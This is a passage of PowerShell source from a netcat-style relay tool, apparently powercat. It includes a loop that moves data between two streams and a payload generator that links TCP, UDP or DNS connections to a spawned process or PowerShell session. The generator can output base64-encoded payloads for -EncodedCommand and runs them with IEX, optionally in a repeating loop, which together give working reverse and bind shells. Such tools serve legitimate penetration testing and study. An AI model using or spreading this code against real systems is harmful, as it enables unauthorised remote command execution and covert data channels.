}
finally
{
  try
  {
    Write-Verbose "Closing Stream 1..."
    Stream1_Close $Stream1Vars
  }
  catch
  {
    Write-Verbose "Failed to close Stream 1"
  }
}

}
########## POWERSHELL FUNCTIONS ##########

########## CONSOLE FUNCTIONS ##########
function Setup_Console
{
param($FuncSetupVars)
$FuncVars = @{}
  $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  $FuncVars["Output"] = $FuncSetupVars[0]
  $FuncVars["OutputBytes"] = [byte[]]@()
  $FuncVars["OutputString"] = ""
  return $FuncVars
}
function ReadData_Console
{
  param($FuncVars)
  $Data = $null
  if($Host.UI.RawUI.KeyAvailable)
  {
    $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n")
  }
  return $Data,$FuncVars
}
function WriteData_Console
{
  param($Data,$FuncVars)
  switch($FuncVars["Output"])
  {
    "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)}
    "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)}
    "Bytes" {$FuncVars["OutputBytes"] += $Data}
  }
  return $FuncVars
}
function Close_Console
{
  param($FuncVars)
  if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]}
  elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]}
  return
}
########## CONSOLE FUNCTIONS ##########

########## MAIN FUNCTION ##########
function Main
{
  param($Stream1SetupVars,$Stream2SetupVars)
  try
  {
    [byte[]]$InputToWrite = @()
    $Encoding = New-Object System.Text.AsciiEncoding
    if($i -ne $null)
    {
      Write-Verbose "Input from -i detected..."
      if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
      elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
      elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
      else{Write-Host "Unrecognised input type." ; return}
}

  Write-Verbose "Setting up Stream 1..."
  try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  catch{Write-Verbose "Stream 1 Setup Failure" ; return}

  Write-Verbose "Setting up Stream 2..."
  try{$Stream2Vars = Stream2_Setup $Stream2SetupVars}
  catch{Write-Verbose "Stream 2 Setup Failure" ; return}

  $Data = $null

  if($InputToWrite -ne @())
  {
    Write-Verbose "Writing input to Stream 1..."
    try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
    catch{Write-Host "Failed to write input to Stream 1" ; return}
  }

  if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}

  Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
  while($True)
  {
    try
    {
      $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars
      if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
    }

    try
    {
      $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
      if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
    }
  }
}
finally
{
  try
  {
    #Write-Verbose "Closing Stream 2..."
    Stream2_Close $Stream2Vars
  }
  catch
  {
    Write-Verbose "Failed to close Stream 2"
  }
  try
  {
    #Write-Verbose "Closing Stream 1..."
    Stream1_Close $Stream1Vars
  }
  catch
  {
    Write-Verbose "Failed to close Stream 1"
  }
}

}
########## MAIN FUNCTION ##########

########## GENERATE PAYLOAD ##########
if($u)
{
  Write-Verbose "Set Stream 1: UDP"
  $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
  $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
  $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
  $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")
  if($l){$InvokeString = "Main @('',`$True,'$p','$t') "}
  else{$InvokeString = "Main @('$c',`$False,'$p','$t') "}
}
elseif($dns -ne "")
{
  Write-Verbose "Set Stream 1: DNS"
  $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
  $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
  $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
  $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
  if($l){return "This feature is not available."}
  else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "}
}
else
{
  Write-Verbose "Set Stream 1: TCP"
  $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
  $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
  $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
  $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
  if($l){$InvokeString = "Main @('',`$True,$p,$t) "}
  else{$InvokeString = "Main @('$c',`$False,$p,$t) "}
}

if($e -ne "")
{
  Write-Verbose "Set Stream 2: Process"
  $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n")
  $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_CMD} + "`n}`n`n")
  $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n")
  $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n")
  $InvokeString += "@('$e')`n`n"
}
elseif($ep)
{
  Write-Verbose "Set Stream 2: Powershell"
  $InvokeString += "`n`n"
}
elseif($r -ne "")
{
  if($r.split(":")[0].ToLower() -eq "udp")
  {
    Write-Verbose "Set Stream 2: UDP"
    $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
    $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
    $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
    $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")
    if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
    elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
    else{return "Bad relay format."}
  }
  if($r.split(":")[0].ToLower() -eq "dns")
  {
    Write-Verbose "Set Stream 2: DNS"
    $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
    $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
    $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
    $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
    if($r.split(":").Count -eq 2){return "This feature is not available."}
    elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")}
    else{return "Bad relay format."}
  }
  elseif($r.split(":")[0].ToLower() -eq "tcp")
  {
    Write-Verbose "Set Stream 2: TCP"
    $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
    $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
    $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
    $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
    if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
    elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
    else{return "Bad relay format."}
  }
}
else
{
  Write-Verbose "Set Stream 2: Console"
  $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n")
  $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n")
  $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n")
  $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n")
  $InvokeString += ("@('" + $o + "')")
}

if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")}
else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")}
$InvokeString = ($FunctionString + $InvokeString)
########## GENERATE PAYLOAD ##########

########## RETURN GENERATED PAYLOADS ##########
if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))}
elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString}
########## RETURN GENERATED PAYLOADS ##########

########## EXECUTION ##########
$Output = $null
try
{
  if($rep)
  {
    while($True)
    {
      $Output += IEX $InvokeString
      Start-Sleep -s 2
      Write-Verbose "Repetition Enabled: Restarting..."
    }
  }
  else
  {
    $Output += IEX $InvokeString
  }
}
finally
{
  if($Output -ne $null)
  {
    if($of -eq ""){$Output}
    else{[io.file]::WriteAllBytes($of,$Output)}
}
}
########## EXECUTION ##########
}
